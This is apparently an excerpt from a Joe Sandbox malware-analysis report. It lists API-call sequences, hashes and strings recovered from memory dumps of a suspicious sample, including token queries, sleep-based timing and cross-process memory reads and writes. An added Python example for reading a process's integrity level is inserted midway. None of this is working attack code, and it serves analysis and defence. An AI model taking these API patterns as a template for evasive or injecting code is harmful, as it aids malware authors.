                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF134D
                                                  • SelectObject.GDI32(?,00000000), ref: 00BF135C
                                                  • BeginPath.GDI32(?), ref: 00BF1373
                                                  • SelectObject.GDI32(?,00000000), ref: 00BF139C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: ebc51974f3004f6c200f5038dd1d60256a6fc98e67579324f796fa65f7a333e2
                                                  • Instruction ID: 175ec82e18622a704c563ce31f0d21f743028d62a3386a7b21febcbde329f103
                                                  • Opcode Fuzzy Hash: ebc51974f3004f6c200f5038dd1d60256a6fc98e67579324f796fa65f7a333e2
                                                  • Instruction Fuzzy Hash: 31214831840608EFDB119F29EC4476D7BE8FB10321F144B6AF918975E0D372999ADB94
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: b270bd2ab038736aab9b8aab2eeaa3139c78e5dcd859ec479ed35413b48d39e8
                                                  • Instruction ID: 6e2131a0eaad366230c16abaadc3b1b7ad97fbdac105e6fcf356c24d79e89ea2
                                                  • Opcode Fuzzy Hash: b270bd2ab038736aab9b8aab2eeaa3139c78e5dcd859ec479ed35413b48d39e8
                                                  • Instruction Fuzzy Hash: C201B5716001057BE2046A165DC2FFBB76CEE1178CF084025FE1596246EB54EE21A2A4
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C54ABA
                                                  • __beginthreadex.LIBCMT ref: 00C54AD8
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00C54AED
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF(-1 = INFINITE),?,?,?,?), ref: 00C54B03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C54B0A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 8b9a85b4b4e286da54f8530a2ba29a40b9ebc6a220e0473b1c3a09cb0f44268a
                                                  • Instruction ID: 3228634b3f44f0ab393aebf4ff3ebf13e34c431c2710e74193edad24348e9c93
                                                  • Opcode Fuzzy Hash: 8b9a85b4b4e286da54f8530a2ba29a40b9ebc6a220e0473b1c3a09cb0f44268a
                                                  • Instruction Fuzzy Hash: 7511E17AD09609BBC7058BA8AC48B9E7BACAB45325F144369FC28D3250D671898487A1
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004(DACL_SECURITY_INFORMATION),?,00000000,?), ref: 00C4821E
                                                  • GetLastError.KERNEL32(?,00C47CE2,?,?,?), ref: 00C48228
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C47CE2,?,?,?), ref: 00C48237
                                                  • HeapAlloc.KERNEL32(00000000,?,00C47CE2,?,?,?), ref: 00C4823E
                                                  • GetUserObjectSecurity.USER32(?,00000004(DACL_SECURITY_INFORMATION),00000000,?,?), ref: 00C48255
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: e4321fe4462b03da68bf691e9c24a87912c28cc0f40c123ec593b281f28d66ce
                                                  • Instruction ID: 22c43bce533a80cf2f168331fe34231982c4f94ec8fabaf4be0f836849260b06
                                                  • Opcode Fuzzy Hash: e4321fe4462b03da68bf691e9c24a87912c28cc0f40c123ec593b281f28d66ce
                                                  • Instruction Fuzzy Hash: 08016971204204BFDB204FA6DC88E6F7BACFF8A764B50042DF859D2260DA718D45CA70
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?,?,00C47455), ref: 00C47127
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47142
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47150
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?), ref: 00C47160
                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C4716C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 93d28da85016d6502d4225f7d9240dc23966287239d41a49ad2d29e0a5f1fde6
                                                  • Instruction ID: 4e4696682438cbabe6578bfdd5e168682ecce4d9e6135e410d6f11368638dd99
                                                  • Opcode Fuzzy Hash: 93d28da85016d6502d4225f7d9240dc23966287239d41a49ad2d29e0a5f1fde6
                                                  • Instruction Fuzzy Hash: 88017C72A05204ABDB114F64DC88BAE7BADFF457A1F144268FD0DD2220D771DE819BA0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55260
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C5526E
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55276
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C55280
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: cccc02f314efddb434537583ad188033428fd3ad8d1ee45152ef25353af9be4e
                                                  • Instruction ID: 5e941802a38dfba82c9ff7ff731e4f4408be90f24add31587e51075fde79e996
                                                  • Opcode Fuzzy Hash: cccc02f314efddb434537583ad188033428fd3ad8d1ee45152ef25353af9be4e
                                                  • Instruction Fuzzy Hash: E1015735D01A29DBCF00EFE4EC98AEDBB78BB08322F40005AE945F2150CB305599CBA9
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C48121
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C4812B
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C4813A
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48141
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48157
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 1cf1c779b7d586ac93f63b0a920b4ad59b7d1d894432a7381a6ecbea0307df83
                                                  • Instruction ID: af0eccc00f43bf27941a7b111d32a258a51ca2921f374dba840c9febfe57b258
                                                  • Opcode Fuzzy Hash: 1cf1c779b7d586ac93f63b0a920b4ad59b7d1d894432a7381a6ecbea0307df83
                                                  • Instruction Fuzzy Hash: 69F04F71200304AFEB110FA5ECC8F6F3BACFF49754F00002AF999D6160CA619986DA60
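The record above shows the standard two-call GetTokenInformation sequence for a process's mandatory label: a size probe that fails, GetLastError, a HeapAlloc of the reported size, and a second call into the allocated buffer. The following is an added example, not code from the analysed sample or from Joe Sandbox, that performs the same query with ctypes on Windows and decodes the returned TOKEN_MANDATORY_LABEL SID in pure Python, so the decoding can be exercised on any platform. In winnt.h the information class for this query is TokenIntegrityLevel = 25 (class 3 is TokenPrivileges), so the example passes 25. The MEDIUM_SID bytes and the other test vectors are constructed for the demonstration.

```python
"""Query a token's integrity level the way the record above does:
probe the size, expect ERROR_INSUFFICIENT_BUFFER, allocate, query again.
Added example, not code from the analysed sample or from Joe Sandbox."""
import struct
import sys

# TOKEN_INFORMATION_CLASS value for TokenIntegrityLevel (winnt.h); class 3 is TokenPrivileges
TOKEN_INTEGRITY_LEVEL = 25
SECURITY_MANDATORY_LABEL_AUTHORITY = 16          # the "16" in S-1-16-<rid>
ERROR_INSUFFICIENT_BUFFER = 122
TOKEN_QUERY = 0x0008

# Well-known mandatory-label RIDs (SECURITY_MANDATORY_*_RID in winnt.h)
INTEGRITY_LEVELS = {
    0x0000: "untrusted",
    0x1000: "low",
    0x2000: "medium",
    0x2100: "medium-plus",
    0x3000: "high",
    0x4000: "system",
    0x5000: "protected",
}


def make_integrity_sid(rid):
    """Build the binary SID S-1-16-<rid>: revision 1, one sub-authority,
    6-byte big-endian identifier authority, then the RID as a little-endian DWORD."""
    return bytes([1, 1]) + SECURITY_MANDATORY_LABEL_AUTHORITY.to_bytes(6, "big") + struct.pack("<I", rid)


# Constructed test vector: medium integrity (S-1-16-8192), not taken from the sample
MEDIUM_SID = make_integrity_sid(0x2000)


def parse_sid(sid):
    """Render a binary SID as its S-R-A-S... string, validating the layout first."""
    if len(sid) < 8:
        raise ValueError("SID too short")
    revision, count = sid[0], sid[1]
    if revision != 1 or count > 15 or len(sid) < 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def integrity_from_sid(sid):
    """Map a mandatory-label SID to (rid, level name). Non-label SIDs are rejected;
    a RID that is not one of the well-known values is reported as 'unknown'."""
    if len(sid) < 12 or sid[0] != 1 or sid[1] < 1 or len(sid) < 8 + 4 * sid[1]:
        raise ValueError("malformed SID")
    if int.from_bytes(sid[2:8], "big") != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory-label SID: " + parse_sid(sid))
    rid = struct.unpack_from("<I", sid, 8 + 4 * (sid[1] - 1))[0]  # last sub-authority is the RID
    return rid, INTEGRITY_LEVELS.get(rid, "unknown")


def get_process_integrity_level():
    """Windows only: the two-call GetTokenInformation(TokenIntegrityLevel) pattern."""
    if sys.platform != "win32":
        raise OSError("GetTokenInformation is only available on Windows")
    import ctypes
    from ctypes import wintypes

    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    advapi32.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    advapi32.GetTokenInformation.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID,
                                             wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    advapi32.GetLengthSid.argtypes = [ctypes.c_void_p]
    advapi32.GetLengthSid.restype = wintypes.DWORD

    token = wintypes.HANDLE()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        needed = wintypes.DWORD(0)
        # First call with no buffer: fails with ERROR_INSUFFICIENT_BUFFER and reports the size
        advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, None, 0, ctypes.byref(needed))
        if ctypes.get_last_error() != ERROR_INSUFFICIENT_BUFFER:
            raise ctypes.WinError(ctypes.get_last_error())
        buf = ctypes.create_string_buffer(needed.value)   # stands in for the HeapAlloc in the record
        if not advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, buf, needed.value, ctypes.byref(needed)):
            raise ctypes.WinError(ctypes.get_last_error())
        # TOKEN_MANDATORY_LABEL.Label.Sid is a PSID that points into the same buffer
        psid = ctypes.cast(buf, ctypes.POINTER(ctypes.c_void_p))[0]
        sid = ctypes.string_at(psid, advapi32.GetLengthSid(psid))
        return integrity_from_sid(sid)
    finally:
        kernel32.CloseHandle(token)


if __name__ == "__main__":
    print(parse_sid(MEDIUM_SID), integrity_from_sid(MEDIUM_SID))
    if sys.platform == "win32":
        print("current process:", get_process_integrity_level())
```

Run as a script it prints the decoded constructed SID and, on Windows, the integrity level of the running interpreter (medium for a normal user session, high for an elevated one). The SID decoder rejects anything whose identifier authority is not 16, so a caller cannot mistake a user or group SID handed back through a bug for an integrity label.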
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C4C1F7
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C4C20E
                                                  • MessageBeep.USER32(00000000), ref: 00C4C226
                                                  • KillTimer.USER32(?,0000040A), ref: 00C4C242
                                                  • EndDialog.USER32(?,00000001), ref: 00C4C25C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 16a9e946d8ed10510a7516b4cad9edda8caed5698fd465a21d54f26cb1aa01f3
                                                  • Instruction ID: c35526d296e966050ed00653b9c300ef3e5eb6033bd0af9da78cc69788804562
                                                  • Opcode Fuzzy Hash: 16a9e946d8ed10510a7516b4cad9edda8caed5698fd465a21d54f26cb1aa01f3
                                                  • Instruction Fuzzy Hash: C801A230504704ABEB705B60ED8EFAA77B8BB00B06F00026DB556A14F1DBE469858B90
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00BF13BF
                                                  • StrokeAndFillPath.GDI32(?,?,00C2B888,00000000,?), ref: 00BF13DB
                                                  • SelectObject.GDI32(?,00000000), ref: 00BF13EE
                                                  • DeleteObject.GDI32 ref: 00BF1401
                                                  • StrokePath.GDI32(?), ref: 00BF141C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: d6825d2c50d58c74979b559f65966150ef5e85230b46623d949ea3c9bd8f7d22
                                                  • Instruction ID: 1cada085aed074cf616e3bd26915ad09b1d94529a50e7d7bb84aa7ee6093c3f6
                                                  • Opcode Fuzzy Hash: d6825d2c50d58c74979b559f65966150ef5e85230b46623d949ea3c9bd8f7d22
                                                  • Instruction Fuzzy Hash: D1F0C930044A08EBDB125F2AEC8D76C3BE5E741326F088768E56D991F1C732499ADF50
                                                  APIs
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00BF7A51: _memmove.LIBCMT ref: 00BF7AAB
                                                  • __swprintf.LIBCMT ref: 00C02ECD
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C02D66
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: d0a38adb24668e93fdf775de012079f69fc719f607d63a1ee32a376c8a5f7474
                                                  • Instruction ID: f0d93ad0eb76bd00c2880aa7caa6b510f34b6e85911effaff253b7471dc7b4eb
                                                  • Opcode Fuzzy Hash: d0a38adb24668e93fdf775de012079f69fc719f607d63a1ee32a376c8a5f7474
                                                  • Instruction Fuzzy Hash: 95916C71118205AFCB14EF28C889C7FB7E8EF85714F00495DF5969B2A1DA70EE48DB52
                                                  APIs
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                  • CoInitialize.OLE32(00000000), ref: 00C5B9BB
                                                  • CoCreateInstance.OLE32(00C82D6C,00000000,00000001,00C82BDC,?), ref: 00C5B9D4
                                                  • CoUninitialize.OLE32 ref: 00C5B9F1
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: bdec235ca2a480aed551672537dce64409a5afdd88324c68b841a2d15676c35a
                                                  • Instruction ID: cd2095ee7c4693582c4e80c002e78eaa390e3ef9eddf7891342a878e437c90dd
                                                  • Opcode Fuzzy Hash: bdec235ca2a480aed551672537dce64409a5afdd88324c68b841a2d15676c35a
                                                  • Instruction Fuzzy Hash: 5DA16B756043059FC700DF14C884E2ABBE5FF89314F148998F9A99B3A2CB31ED89CB91
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00C150AD
                                                    • Part of subcall function 00C200F0: __87except.LIBCMT ref: 00C2012B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: a87302e7bcdd165a2e5dc6616a54d68159c08f2d9da793ca7019523c915f97be
                                                  • Instruction ID: bb8067d7efdb1ba294a791deb4df28c65b84442db85820e5080e9621a6c63c78
                                                  • Opcode Fuzzy Hash: a87302e7bcdd165a2e5dc6616a54d68159c08f2d9da793ca7019523c915f97be
                                                  • Instruction Fuzzy Hash: E3517E71A0C502D6DB11B764D9013BE2B94EB82700F308D5BE4E5866ABEF358FD4B786
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: 35287405c2a0225dc53b1264cf693a9fcb039e8148ce90c652d9901cdfd31bbc
                                                  • Instruction ID: b11d6232128e4720b111337293e9b8ae2a54f2de6f072e087d1155600e8d762d
                                                  • Opcode Fuzzy Hash: 35287405c2a0225dc53b1264cf693a9fcb039e8148ce90c652d9901cdfd31bbc
                                                  • Instruction Fuzzy Hash: F951B271900706DBDB24CF65C941BAAB7F4FF04304F20456EE95ADB291E770EA94DB80
                                                  APIs
                                                    • Part of subcall function 00C514BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49296,?,?,00000034,00000800,?,00000034), ref: 00C514E6
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C4983F
                                                    • Part of subcall function 00C51487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C492C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C514B1
                                                    • Part of subcall function 00C513DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C51409
                                                    • Part of subcall function 00C513DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C4925A,00000034,?,?,00001004,00000000,00000000), ref: 00C51419
